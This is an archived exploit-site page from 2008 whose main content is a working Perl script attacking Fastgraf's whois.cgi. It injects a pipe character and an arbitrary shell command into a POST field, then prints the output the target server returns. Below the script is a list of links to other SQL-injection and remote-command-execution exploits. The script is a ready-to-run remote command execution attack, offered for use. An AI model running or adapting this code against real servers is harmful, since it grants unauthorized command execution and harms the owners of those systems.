Full-TR - Fastgraf's whois.cgi Remote Command Execution Exploit

Exploit / Web Apps Exploit / Fastgraf's whois.cgi Remote Command Execution Exploit

Eklenme Tarihi: 2008-10-20 22:59

#!/usr/bin/perl
###############################################################
# whois.pl - Marco van Berkum - m.v.berkum@obit.nl #
# homepage: http://ws.obit.nl - exploits Fastgraf's whois.cgi #
# #
# DO NOT EDIT THIS HEADER, else the bedbugs will bite #
# Greets to sigmo for finding stupid POST examples #
# Also greetings to DUCKEL (YES YOU HAVE CREDIT NOW ;)) #
# #
# Use like this: #
# ./whois.pl www.ifyoureadthisyouaregay.com "ls -al" #
###############################################################

use IO::Socket;
$host = $ARGV[0]; $command = $ARGV[1]; $length = length($command) + 8;

$sock = new IO::Socket::INET (PeerAddr => $host, PeerPort => 80, Proto => 'tcp');
if($sock) {
print $sock "POST http://$host/cgi-bin/whois.cgi HTTP/1.0
User-Agent: Whois Meta Character Exploit Browser :P
Host: $host
Content-length: $length

host=%7c$command\n\n";
sleep(3); # change to lower or higher, depending on your connection
sysread($sock, $buffer, 100000);
($empty, $output) = split(/PRE/, $buffer);
$output =~ s/[\<\>\/]//g;
if($output) {
print("$output\n");
} else { print "No data, or not vulnerable\n";
}
}
close $sock;

Yorumlar:

Hen�z Yorum Eklenmedi

Yorum Ekle

Keywords:

Benzer Sayfalar (Similar Pages):

Bulunamad�. (not found)

Bu Sayfalarda �lginizi �ekebilir (The Links Bellow May Attract You As Well):

Exploit / Web Apps Exploit / Turbo Seek Null Byte Error Discloses Files to Remote Users
Exploit / Web Apps Exploit / PHP-Nuke 7.4 Remote Privilege Escalation
Exploit / Web Apps Exploit / TorrentTrader 1.0 RC2 SQL Injection Exploit
Exploit / Web Apps Exploit / phpMyWebhosting SQL Injection Exploit
Exploit / Web Apps Exploit / PHP-NUKE version <= 6.9 'cid' sql injection Remote Exploit
Exploit / Web Apps Exploit / phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit
Exploit / Web Apps Exploit / phpBB 2.0.5 SQL Injection password disclosure Exploit
Exploit / Web Apps Exploit / UtilMind Mail List 1.7 - Users Can Execute Commands
Exploit / Web Apps Exploit / ListMail v112 - Command Execution
Exploit / Web Apps Exploit / Poll It CGI v2.0 exploit
Exploit / Web Apps Exploit / CMScore SQL Injection Exploit
Exploit / Web Apps Exploit / MyPHP Forum 1.0 SQL Injection Exploit
Exploit / Web Apps Exploit / PostNuke PostWrap Module Remote Exploit
Exploit / Web Apps Exploit / PerlDesk 1.x SQL-Injection Exploit
Exploit / Web Apps Exploit / LiteForum 2.1.1 sql injection exploit
Exploit / Web Apps Exploit / Siteman <= 1.1.10 Remote Administrative Account Addition Exploit
Exploit / Web Apps Exploit / AWStats configdir Remote Command Execution Exploit (perl code)
Exploit / Web Apps Exploit / ITA Forum <= 1.49 SQL Injection Exploit
Exploit / Web Apps Exploit / e107 include() Remote Exploit
Exploit / Web Apps Exploit / phpMyChat 0.14.5 Remote Improper File Permissions Exploit
Exploit / Web Apps Exploit / phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version)
Exploit / Web Apps Exploit / Invision Power Board v2.0.0 - 2.0.2 Sql Injection Exploit
Exploit / Web Apps Exploit / phpBB <= 2.0.10 Remote Command Execution Exploit
Exploit / Web Apps Exploit / GFHost PHP GMail Remote Command Execution Exploit
Exploit / Web Apps Exploit / TWiki 20030201 search.pm Remote Command Execution Exploit
Exploit / Web Apps Exploit / UBB.threads 6.2.*-6.3.* one char bruteforce exploit
Exploit / Web Apps Exploit / ocPortal 1.0.3 Remote File Inclusion
Exploit / Web Apps Exploit / The Includer CGI <= 1.0 Remote Command Execution (new version2)
Exploit / Web Apps Exploit / The Includer CGI <= 1.0 Remote Command Execution (new version)
Exploit / Web Apps Exploit / PHP-Nuke 6.x - 7.6 Top module Remote Sql Injection Exploit (working)